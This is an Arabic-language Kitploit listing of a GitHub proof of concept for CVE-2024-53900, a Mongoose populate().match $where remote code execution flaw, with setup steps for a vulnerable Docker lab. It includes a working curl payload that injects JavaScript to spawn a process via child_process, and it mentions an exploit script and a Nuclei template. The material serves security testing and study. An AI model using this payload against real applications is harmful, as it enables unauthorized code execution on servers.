Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-53900 — بيئة قابلة للتكرار وإثبات المفهوم (PoC) لـ CVE-2024-53900، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) حرجة في Mongoose عبر populate().match $where. يتضمن سكريبت استغلال آلي وقالب Nuclei لاختبار الأمان. | Kitploit
أدوات/GitHubGitHub/www-spam/cve-2024-53900
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubwww-spam/cve-2024-53900

CVE-2024-53900

بيئة قابلة للتكرار وإثبات المفهوم (PoC) لـ CVE-2024-53900، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) حرجة في Mongoose عبر populate().match $where. يتضمن سكريبت استغلال آلي وقالب Nuclei لاختبار الأمان.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-53900 - Mongoose populate().match $where RCE

يوفر هذا المستودع بيئة ضعيفة قابلة للتكرار وإثبات المفهوم (PoC) لـ CVE-2024-53900، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) في Mongoose < 8.8.3.


📌 تفاصيل الثغرة

  • CVE: CVE-2024-53900
  • المتأثر: Mongoose < 8.8.3
  • الخطورة: حرجة (CVSS 9.1)
  • المتجه: populate().match مع $where
  • التأثير: تنفيذ تعليمات JavaScript عشوائية (RCE) في سياق Node.js

المراجع:

  • إشعار GitHub
  • الإصلاح

🛠️ تعليمات الإعداد

1. استنساخ المستودع

root@kitploit:~
git clone https://github.com/www-spam/CVE-2024-53900.git
cd CVE-2024-53900

2. تشغيل البيئة (Docker Compose)

root@kitploit:~
docker-compose up -d

📌 إثبات المفهوم لواجهة المستخدم (الآلة الحاسبة)

افتراضيًا، يعمل تطبيق Node.js الضعيف داخل Docker.
ومع ذلك، تطبيقات واجهة المستخدم الرسومية (مثل xcalc أو gnome-calculator) لن تعمل داخل حاوية.

👉 إذا كنت ترغب في إظهار RCE عن طريق فتح نافذة الآلة الحاسبة:

  1. تشغيل MongoDB في Docker (كقاعدة بيانات خلفية)

    root@kitploit:~
    docker run -d --name mongo -p 27017:27017 mongo:6
    
  2. تشغيل تطبيق Node.js الضعيف محليًا

root@kitploit:~
   cd ~/cve-2024/app
   npm install
   node server.js
  • يعمل MongoDB على المنفذ 27017
  • يعمل تطبيق Node.js الضعيف على المنفذ 5000

📂 هيكل الدليل

root@kitploit:~
/home/kali/cve-2024/
├── docker-compose.yml     # إعداد البيئة
├── exploit.py             # سكربت الاستغلال الآلي
├── CVE-2024-53900.yaml    # قالب Nuclei
├── README.md              # التوثيق
├── app/                   # تطبيق Node.js الضعيف
│   ├── Dockerfile
│   ├── package.json
│   ├── server.js
│   ├── models.js
│   └── views/
└── data/                  # حجم MongoDB

🚀 الاستغلال

اختبار يدوي

root@kitploit:~
curl "http://localhost:5000/book/{OBJECT_ID}/detail?view[path]=author&view[match][$where]=global.process.mainModule.constructor._load('child_process').exec('xcalc')"

إثبات المفهوم الآلي

root@kitploit:~
python3 exploit.py --url http://localhost:5000

باستخدام Nuclei

root@kitploit:~
nuclei \ -u http://localhost:5000/book/{{OBJECT_ID}/detail \ -t ~/.local/nuclei-templates/CVE-2024-53900.yaml \ -var pfield=author
صورة

🔒 ملاحظات أمنية

  • للبحث والاختبار فقط (وليس للإنتاج).
  • الحمولة مقيدة بالعمليات الآمنة (مثل إنشاء الملفات).
  • معزولة بالكامل باستخدام Docker.

✅ البيئة المختبرة

  • نظام التشغيل: Kali Linux
  • MongoDB: mongo:6
  • Node.js: 18
  • Mongoose: 8.5.0 (ضعيف)
  • Express: 4.18.2

📸 عرض توضيحي

صورة
تنزيل الأداة